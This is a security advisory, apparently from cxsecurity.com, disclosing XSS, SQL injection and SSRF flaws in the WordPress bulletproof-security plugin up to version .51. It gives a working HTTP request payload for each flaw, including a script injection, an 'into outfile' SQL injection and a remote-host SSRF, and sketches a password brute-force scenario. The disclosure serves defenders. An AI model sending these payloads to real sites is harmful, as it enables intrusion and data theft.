WordPress Bulletproof-Security .51 XSS / SQL Injection / SSRF

2014.11.06
Credit: Pietro Oliva
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89
CWE-79

Vulnerability title: Wordpress bulletproof-security <=.51 multiple vulnerabilities Author: Pietro Oliva CVE: CVE-2014-7958, CVE-2014-7959, CVE-2014-8749 Vendor: AITpro Product: bulletproof-security Affected version: bulletproof-security <= .51 Vulnerabilities fixed in version: .51.1 Details: xss vulnerability (CVE-2014-7958): POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php HTTP/1.1 dbname=&dbuser=&dbpassword=&dbhost=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account SQL injection vulnerability (CVE-2014-7959, correct db username and password is required in order to exploit this): POST /wordpress/wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php HTTP/1.1 dbname=information_schema&dbuser=root&dbpassword=password&dbhost=&tableprefix=tables+into+outfile+'/tmp/tables'%3b+--+&username=&Login-Security-Unlock=Unlock+User+Account SSRF vulnerability (CVE-2014-8749) POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php HTTP/1.1 dbname=&dbuser=root&dbpassword&dbhost=remotedatabase.com&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account Possible scenario: - the user sends a request with username, password, host and other parameters to the vulnerable page - the server doesn't check the host parameter to be in a whitelist of permitted databases - the server performs an authentication request to a remote or internal network database and gives back to the attacker the authentication result -After n attemps the attacker has bypassed access restrictions (if any) to the remote database, discovered the remote database password, and made it appear bulletproof-security as the source of the attack. Extra step: -If the sql injection flaw (CVE-2014-7959) is not fixed, an attacker could also execute arbitrary sql statement on the remote server, as the vulnerable page executes a query if the authentication is successful (without filtering or use prepared statements). The source of the attack would appear to be the bulletproof-security vulnerable site.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top